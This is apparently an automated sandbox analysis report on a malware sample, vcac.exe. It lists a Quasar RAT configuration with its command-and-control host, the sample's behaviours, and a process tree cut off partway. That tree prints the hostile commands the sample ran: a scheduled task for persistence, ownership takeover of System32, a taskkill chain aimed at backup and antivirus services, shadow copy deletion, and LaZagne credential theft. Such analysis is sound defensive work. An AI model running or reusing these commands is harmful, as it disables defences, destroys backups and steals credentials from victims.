Resubmissions
01-10-2023 00:42
231001-a2v13agb7v 1001-10-2023 00:39
231001-azmlxahf45 1030-09-2023 17:31
230930-v3wdfafh25 10Analysis
-
max time kernel
149s -
max time network
160s -
platform
windows10-1703_x64 -
resource
win10-20230915-en -
resource tags
arch:x64arch:x86image:win10-20230915-enlocale:en-usos:windows10-1703-x64system -
submitted
01-10-2023 00:39
Behavioral task
behavioral1
Sample
vcac.exe
Resource
win10-20230915-en
General
-
Target
vcac.exe
-
Size
24.2MB
-
MD5
bd60bf2d7f1f2f813f22005f645b54a6
-
SHA1
f26fd66a37d21522bcc3bb95dd1a0af12d3978cc
-
SHA256
b416ba3614cf4d62af4a1a558d2ca647ecf8196b251217e6d5809f5044bb4d9b
-
SHA512
1522830159961b626f0b16bdc5daa1923f7a911b7a80718143fe8cf6737bd86f25425d23badb7137319ed80afedf0a70914dfd40a071bde1507ab4d9bb999cc9
-
SSDEEP
98304:qKBbBWIgWljGxRB/LLqvc22SsaNYfdPBldt6+dBcjHVCU688cIyGOk3ta:P4xRBj4B7j4U6gl
Malware Config
Extracted
quasar
-
reconnect_delay
1
Extracted
quasar
1.4.1
user
192.168.0.13:3440
elpepemanca.ddns.net:3440
5950a87d-00d0-4fc0-a953-61143318e6d1
-
encryption_key
1A866C514D7B8C5F02AAA72B847C1F305295B74C
-
install_name
Windows.exe
-
log_directory
Logs
-
reconnect_delay
1
-
startup_key
Discord.exe
-
subdirectory
System
Signatures
-
Quasar payload 4 IoCs
resource yara_rule behavioral1/memory/592-1-0x00000000006D0000-0x0000000001F0C000-memory.dmp family_quasar behavioral1/files/0x000600000001afd2-356.dat family_quasar behavioral1/files/0x000600000001afd2-357.dat family_quasar behavioral1/memory/5016-368-0x0000000000970000-0x0000000000C94000-memory.dmp family_quasar -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Disables Task Manager via registry modification
-
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts vcac.exe -
Modifies Windows Firewall 1 TTPs 5 IoCs
pid Process 1796 netsh.exe 96 netsh.exe 3584 netsh.exe 840 netsh.exe 2584 netsh.exe -
Possible privilege escalation attempt 2 IoCs
pid Process 4600 takeown.exe 4784 icacls.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\exp.exe vcac.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\exp.exe vcac.exe -
Executes dropped EXE 8 IoCs
pid Process 3756 lm.exe 3784 mbr.exe 4272 svchost.exe 2680 pass.exe 5016 server.exe 1856 taskkill.exe 4904 LaZagne.exe 2704 LaZagne.exe -
Loads dropped DLL 40 IoCs
pid Process 3756 lm.exe 3756 lm.exe 592 vcac.exe 592 vcac.exe 2704 LaZagne.exe 2704 LaZagne.exe 2704 LaZagne.exe 2704 LaZagne.exe 2704 LaZagne.exe 2704 LaZagne.exe 2704 LaZagne.exe 2704 LaZagne.exe 2704 LaZagne.exe 2704 LaZagne.exe 2704 LaZagne.exe 2704 LaZagne.exe 2704 LaZagne.exe 2704 LaZagne.exe 2704 LaZagne.exe 2704 LaZagne.exe 2704 LaZagne.exe 2704 LaZagne.exe 2704 LaZagne.exe 2704 LaZagne.exe 2704 LaZagne.exe 2704 LaZagne.exe 2704 LaZagne.exe 2704 LaZagne.exe 2704 LaZagne.exe 2704 LaZagne.exe 2704 LaZagne.exe 2704 LaZagne.exe 2704 LaZagne.exe 2704 LaZagne.exe 2704 LaZagne.exe 2704 LaZagne.exe 2704 LaZagne.exe 2704 LaZagne.exe 2704 LaZagne.exe 2704 LaZagne.exe -
Modifies file permissions 1 TTPs 2 IoCs
pid Process 4784 icacls.exe 4600 takeown.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 7 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2713497151-363818805-1301026598-1000\Software\Microsoft\Office\12.0\Outlook\Profiles\Outlook LaZagne.exe Key opened \REGISTRY\USER\S-1-5-21-2713497151-363818805-1301026598-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook LaZagne.exe Key opened \REGISTRY\USER\S-1-5-21-2713497151-363818805-1301026598-1000\Software\Microsoft\Office\10.0\Outlook\Profiles\Outlook LaZagne.exe Key opened \REGISTRY\USER\S-1-5-21-2713497151-363818805-1301026598-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook LaZagne.exe Key opened \REGISTRY\USER\S-1-5-21-2713497151-363818805-1301026598-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook LaZagne.exe Key opened \REGISTRY\USER\S-1-5-21-2713497151-363818805-1301026598-1000\Software\Microsoft\Office\11.0\Outlook\Profiles\Outlook LaZagne.exe Key opened \REGISTRY\USER\S-1-5-21-2713497151-363818805-1301026598-1000\Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook LaZagne.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2713497151-363818805-1301026598-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Update = "C:\\Users\\Admin\\AppData\\Roaming\\mbr.exe" mbr.exe -
Drops desktop.ini file(s) 1 IoCs
description ioc Process File opened for modification F:\$RECYCLE.BIN\S-1-5-21-2713497151-363818805-1301026598-1000\desktop.ini vcac.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Writes to the Master Boot Record (MBR) 1 TTPs 2 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
description ioc Process File opened for modification \??\PhysicalDrive0 lm.exe File opened for modification \??\PhysicalDrive0 mbr.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File created C:\Windows\System32\LogonUI.exe svchost.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2713497151-363818805-1301026598-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Roaming\\imagewVxc4lS8xaZ9eIm8xZluo1pusaZ370.jpg" vcac.exe -
Drops file in Windows directory 2 IoCs
description ioc Process File created C:\Windows\rescache\_merged\1601268389\3877292338.pri taskmgr.exe File created C:\Windows\rescache\_merged\4183903823\810424605.pri taskmgr.exe -
Detects Pyinstaller 3 IoCs
resource yara_rule behavioral1/files/0x000700000001afd5-403.dat pyinstaller behavioral1/files/0x000700000001afd5-519.dat pyinstaller behavioral1/files/0x000700000001afd5-395.dat pyinstaller -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName taskmgr.exe -
Checks processor information in registry 2 TTPs 5 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4500 schtasks.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe -
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 3128 vssadmin.exe -
Kills process with taskkill 42 IoCs
pid Process 1364 taskkill.exe 3800 taskkill.exe 4972 taskkill.exe 2052 taskkill.exe 4036 taskkill.exe 2080 taskkill.exe 600 taskkill.exe 4268 taskkill.exe 3556 taskkill.exe 2848 taskkill.exe 4928 taskkill.exe 1856 taskkill.exe 4672 taskkill.exe 4040 taskkill.exe 4004 taskkill.exe 212 taskkill.exe 712 taskkill.exe 3092 taskkill.exe 5008 taskkill.exe 1684 taskkill.exe 5048 taskkill.exe 840 taskkill.exe 3988 taskkill.exe 2244 taskkill.exe 4520 taskkill.exe 2340 taskkill.exe 1840 taskkill.exe 4332 taskkill.exe 5020 taskkill.exe 1808 taskkill.exe 4588 taskkill.exe 624 taskkill.exe 8 taskkill.exe 4944 taskkill.exe 4080 taskkill.exe 1944 taskkill.exe 4868 taskkill.exe 4108 taskkill.exe 3800 taskkill.exe 4068 taskkill.exe 908 taskkill.exe 2304 taskkill.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133405944670676345" chrome.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2713497151-363818805-1301026598-1000_Classes\Local Settings firefox.exe -
Modifies registry key 1 TTPs 2 IoCs
pid Process 2144 reg.exe 3064 reg.exe -
Opens file in notepad (likely ransom note) 3 IoCs
pid Process 3568 NOTEPAD.EXE 828 NOTEPAD.EXE 4904 NOTEPAD.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 4956 powershell.exe 4956 powershell.exe 1920 taskmgr.exe 4956 powershell.exe 4956 powershell.exe 592 vcac.exe 592 vcac.exe 592 vcac.exe 592 vcac.exe 592 vcac.exe 592 vcac.exe 592 vcac.exe 1920 taskmgr.exe 1920 taskmgr.exe 592 vcac.exe 592 vcac.exe 592 vcac.exe 592 vcac.exe 592 vcac.exe 592 vcac.exe 592 vcac.exe 592 vcac.exe 592 vcac.exe 592 vcac.exe 592 vcac.exe 592 vcac.exe 592 vcac.exe 1920 taskmgr.exe 2680 pass.exe 2680 pass.exe 2680 pass.exe 1856 taskkill.exe 1856 taskkill.exe 592 vcac.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 592 vcac.exe 1856 taskkill.exe 1920 taskmgr.exe 592 vcac.exe 1920 taskmgr.exe 592 vcac.exe 592 vcac.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 1920 taskmgr.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs
pid Process 3260 chrome.exe 3260 chrome.exe 3260 chrome.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 592 vcac.exe Token: SeTakeOwnershipPrivilege 4600 takeown.exe Token: SeDebugPrivilege 1920 taskmgr.exe Token: SeSystemProfilePrivilege 1920 taskmgr.exe Token: SeCreateGlobalPrivilege 1920 taskmgr.exe Token: SeDebugPrivilege 4068 taskkill.exe Token: SeBackupPrivilege 3024 vssvc.exe Token: SeRestorePrivilege 3024 vssvc.exe Token: SeAuditPrivilege 3024 vssvc.exe Token: SeIncreaseQuotaPrivilege 3816 WMIC.exe Token: SeSecurityPrivilege 3816 WMIC.exe Token: SeTakeOwnershipPrivilege 3816 WMIC.exe Token: SeLoadDriverPrivilege 3816 WMIC.exe Token: SeSystemProfilePrivilege 3816 WMIC.exe Token: SeSystemtimePrivilege 3816 WMIC.exe Token: SeProfSingleProcessPrivilege 3816 WMIC.exe Token: SeIncBasePriorityPrivilege 3816 WMIC.exe Token: SeCreatePagefilePrivilege 3816 WMIC.exe Token: SeBackupPrivilege 3816 WMIC.exe Token: SeRestorePrivilege 3816 WMIC.exe Token: SeShutdownPrivilege 3816 WMIC.exe Token: SeDebugPrivilege 3816 WMIC.exe Token: SeSystemEnvironmentPrivilege 3816 WMIC.exe Token: SeRemoteShutdownPrivilege 3816 WMIC.exe Token: SeUndockPrivilege 3816 WMIC.exe Token: SeManageVolumePrivilege 3816 WMIC.exe Token: 33 3816 WMIC.exe Token: 34 3816 WMIC.exe Token: 35 3816 WMIC.exe Token: 36 3816 WMIC.exe Token: SeIncreaseQuotaPrivilege 3816 WMIC.exe Token: SeSecurityPrivilege 3816 WMIC.exe Token: SeTakeOwnershipPrivilege 3816 WMIC.exe Token: SeLoadDriverPrivilege 3816 WMIC.exe Token: SeSystemProfilePrivilege 3816 WMIC.exe Token: SeSystemtimePrivilege 3816 WMIC.exe Token: SeProfSingleProcessPrivilege 3816 WMIC.exe Token: SeIncBasePriorityPrivilege 3816 WMIC.exe Token: SeCreatePagefilePrivilege 3816 WMIC.exe Token: SeBackupPrivilege 3816 WMIC.exe Token: SeRestorePrivilege 3816 WMIC.exe Token: SeShutdownPrivilege 3816 WMIC.exe Token: SeDebugPrivilege 3816 WMIC.exe Token: SeSystemEnvironmentPrivilege 3816 WMIC.exe Token: SeRemoteShutdownPrivilege 3816 WMIC.exe Token: SeUndockPrivilege 3816 WMIC.exe Token: SeManageVolumePrivilege 3816 WMIC.exe Token: 33 3816 WMIC.exe Token: 34 3816 WMIC.exe Token: 35 3816 WMIC.exe Token: 36 3816 WMIC.exe Token: SeDebugPrivilege 4332 taskkill.exe Token: SeDebugPrivilege 5020 taskkill.exe Token: SeDebugPrivilege 1364 cmd.exe Token: SeDebugPrivilege 1808 taskkill.exe Token: SeDebugPrivilege 908 taskkill.exe Token: SeDebugPrivilege 2080 taskkill.exe Token: SeDebugPrivilege 3800 taskkill.exe Token: SeDebugPrivilege 5008 taskkill.exe Token: SeDebugPrivilege 2244 taskkill.exe Token: SeDebugPrivilege 4588 taskkill.exe Token: SeDebugPrivilege 4080 taskkill.exe Token: SeDebugPrivilege 4672 taskkill.exe Token: SeDebugPrivilege 4040 taskkill.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 592 vcac.exe 592 vcac.exe 592 vcac.exe 592 vcac.exe 592 vcac.exe 592 vcac.exe 592 vcac.exe 592 vcac.exe 1920 taskmgr.exe 592 vcac.exe 592 vcac.exe 592 vcac.exe 592 vcac.exe 592 vcac.exe 592 vcac.exe 592 vcac.exe 592 vcac.exe 592 vcac.exe 592 vcac.exe 592 vcac.exe 592 vcac.exe 592 vcac.exe 592 vcac.exe 592 vcac.exe 592 vcac.exe 592 vcac.exe 592 vcac.exe 592 vcac.exe 592 vcac.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe 1920 taskmgr.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 5016 server.exe 2244 firefox.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 592 wrote to memory of 4656 592 vcac.exe 70 PID 592 wrote to memory of 4656 592 vcac.exe 70 PID 592 wrote to memory of 4656 592 vcac.exe 70 PID 592 wrote to memory of 3456 592 vcac.exe 71 PID 592 wrote to memory of 3456 592 vcac.exe 71 PID 592 wrote to memory of 3456 592 vcac.exe 71 PID 3456 wrote to memory of 3756 3456 cmd.exe 74 PID 3456 wrote to memory of 3756 3456 cmd.exe 74 PID 3456 wrote to memory of 3756 3456 cmd.exe 74 PID 592 wrote to memory of 3784 592 vcac.exe 75 PID 592 wrote to memory of 3784 592 vcac.exe 75 PID 592 wrote to memory of 3784 592 vcac.exe 75 PID 592 wrote to memory of 4272 592 vcac.exe 76 PID 592 wrote to memory of 4272 592 vcac.exe 76 PID 3784 wrote to memory of 4500 3784 mbr.exe 77 PID 3784 wrote to memory of 4500 3784 mbr.exe 77 PID 3784 wrote to memory of 4500 3784 mbr.exe 77 PID 4272 wrote to memory of 4552 4272 svchost.exe 79 PID 4272 wrote to memory of 4552 4272 svchost.exe 79 PID 4552 wrote to memory of 4600 4552 cmd.exe 81 PID 4552 wrote to memory of 4600 4552 cmd.exe 81 PID 4552 wrote to memory of 4784 4552 cmd.exe 82 PID 4552 wrote to memory of 4784 4552 cmd.exe 82 PID 592 wrote to memory of 1816 592 vcac.exe 86 PID 592 wrote to memory of 1816 592 vcac.exe 86 PID 592 wrote to memory of 1816 592 vcac.exe 86 PID 592 wrote to memory of 4436 592 vcac.exe 87 PID 592 wrote to memory of 4436 592 vcac.exe 87 PID 592 wrote to memory of 4436 592 vcac.exe 87 PID 592 wrote to memory of 4520 592 vcac.exe 88 PID 592 wrote to memory of 4520 592 vcac.exe 88 PID 592 wrote to memory of 4520 592 vcac.exe 88 PID 4520 wrote to memory of 3128 4520 cmd.exe 92 PID 4520 wrote to memory of 3128 4520 cmd.exe 92 PID 4520 wrote to memory of 3128 4520 cmd.exe 92 PID 1816 wrote to memory of 4068 1816 cmd.exe 94 PID 1816 wrote to memory of 4068 1816 cmd.exe 94 PID 1816 wrote to memory of 4068 1816 cmd.exe 94 PID 4436 wrote to memory of 1796 4436 cmd.exe 93 PID 4436 wrote to memory of 1796 4436 cmd.exe 93 PID 4436 wrote to memory of 1796 4436 cmd.exe 93 PID 4520 wrote to memory of 3816 4520 taskkill.exe 97 PID 4520 wrote to memory of 3816 4520 taskkill.exe 97 PID 4520 wrote to memory of 3816 4520 taskkill.exe 97 PID 1816 wrote to memory of 4332 1816 cmd.exe 98 PID 1816 wrote to memory of 4332 1816 cmd.exe 98 PID 1816 wrote to memory of 4332 1816 cmd.exe 98 PID 1816 wrote to memory of 5020 1816 cmd.exe 100 PID 1816 wrote to memory of 5020 1816 cmd.exe 100 PID 1816 wrote to memory of 5020 1816 cmd.exe 100 PID 4436 wrote to memory of 96 4436 cmd.exe 101 PID 4436 wrote to memory of 96 4436 cmd.exe 101 PID 4436 wrote to memory of 96 4436 cmd.exe 101 PID 1816 wrote to memory of 1364 1816 cmd.exe 138 PID 1816 wrote to memory of 1364 1816 cmd.exe 138 PID 1816 wrote to memory of 1364 1816 cmd.exe 138 PID 1816 wrote to memory of 1808 1816 cmd.exe 103 PID 1816 wrote to memory of 1808 1816 cmd.exe 103 PID 1816 wrote to memory of 1808 1816 cmd.exe 103 PID 1816 wrote to memory of 908 1816 cmd.exe 104 PID 1816 wrote to memory of 908 1816 cmd.exe 104 PID 1816 wrote to memory of 908 1816 cmd.exe 104 PID 4436 wrote to memory of 3584 4436 cmd.exe 105 PID 4436 wrote to memory of 3584 4436 cmd.exe 105 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
-
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2713497151-363818805-1301026598-1000\Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook LaZagne.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2713497151-363818805-1301026598-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook LaZagne.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\vcac.exe"C:\Users\Admin\AppData\Local\Temp\vcac.exe"1⤵
- Drops file in Drivers directory
- Drops startup file
- Loads dropped DLL
- Drops desktop.ini file(s)
- Sets desktop wallpaper using registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:592 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Roaming\settings.bat2⤵PID:4656
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k cd %appdata% & lm.exe & exit2⤵
- Suspicious use of WriteProcessMemory
PID:3456 -
C:\Users\Admin\AppData\Roaming\lm.exelm.exe3⤵
- Executes dropped EXE
- Loads dropped DLL
- Writes to the Master Boot Record (MBR)
PID:3756
-
-
-
C:\Users\Admin\AppData\Roaming\mbr.exe"C:\Users\Admin\AppData\Roaming\mbr.exe"2⤵
- Executes dropped EXE
- Adds Run key to start application
- Writes to the Master Boot Record (MBR)
- Suspicious use of WriteProcessMemory
PID:3784 -
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Create /TN "Windows Update" /ru SYSTEM /SC ONSTART /TR "C:\Users\Admin\AppData\Roaming\mbr.exe"3⤵
- Creates scheduled task(s)
PID:4500
-
-
-
C:\Users\Admin\AppData\Roaming\svchost.exe"C:\Users\Admin\AppData\Roaming\svchost.exe"2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:4272 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32 && icacls C:\Windows\System32 /grant "%username%:F"3⤵
- Suspicious use of WriteProcessMemory
PID:4552 -
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System324⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4600
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32 /grant "Admin:F"4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4784
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /F /IM BackupExecAgentBrowser* & taskkill /F /IM BackupExecDiveciMediaService* & taskkill /F /IM BackupExecJobEngine* & taskkill /F /IM BackupExecManagementService* & taskkill /F /IM vss* & taskkill /F /IM sql* & taskkill /F /IM svc$* & taskkill /F /IM memtas* & taskkill /F /IM sophos* & taskkill /F /IM veeam* & taskkill /F /IM backup* & taskkill /F /IM GxVss* & taskkill /F /IM GxBlr* & taskkill /F /IM GxFWD* & taskkill /F /IM GxCVD* & taskkill /F /IM GxCIMgr* & taskkill /F /IM DefWatch* & taskkill /F /IM ccEvtMgr* & taskkill /F /IM SavRoam* & taskkill /F /IM RTVscan* & taskkill /F /IM QBFCService* & taskkill /F /IM Intuit.QuickBooks.FCS* & taskkill /F /IM YooBackup* & taskkill /F /IM YooIT* & taskkill /F /IM zhudongfangyu* & taskkill /F /IM sophos* & taskkill /F /IM stc_raw_agent* & taskkill /F /IM VSNAPVSS* & taskkill /F /IM QBCFMonitorService* & taskkill /F /IM VeeamTransportSvc* & taskkill /F /IM VeeamDeploymentService* & taskkill /F /IM VeeamNFSSvc* & taskkill /F /IM veeam* & taskkill /F /IM PDVFSService* & taskkill /F /IM BackupExecVSSProvider* & taskkill /F /IM BackupExecAgentAccelerator* & taskkill /F /IM BackupExecRPCService* & taskkill /F /IM AcrSch2Svc* & taskkill /F /IM AcronisAgent* & taskkill /F /IM CASAD2DWebSvc* & taskkill /F /IM CAARCUpdateSvc* & taskkill /F /IM TeamViewer*2⤵
- Suspicious use of WriteProcessMemory
PID:1816 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM BackupExecAgentBrowser*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4068
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM BackupExecDiveciMediaService*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4332
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM BackupExecJobEngine*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5020
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM BackupExecManagementService*3⤵
- Kills process with taskkill
PID:1364
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM vss*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1808
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM sql*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:908
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM svc$*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2080
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM memtas*3⤵
- Kills process with taskkill
PID:3800
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM sophos*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5008
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM veeam*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2244
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM backup*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4588
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM GxVss*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4080
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM GxBlr*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4672
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM GxFWD*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4040
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM GxCVD*3⤵
- Kills process with taskkill
PID:600
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM GxCIMgr*3⤵
- Kills process with taskkill
PID:624
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM DefWatch*3⤵
- Kills process with taskkill
PID:1684
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM ccEvtMgr*3⤵
- Kills process with taskkill
PID:1944
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM SavRoam*3⤵
- Kills process with taskkill
PID:5048
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM RTVscan*3⤵
- Kills process with taskkill
PID:8
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM QBFCService*3⤵
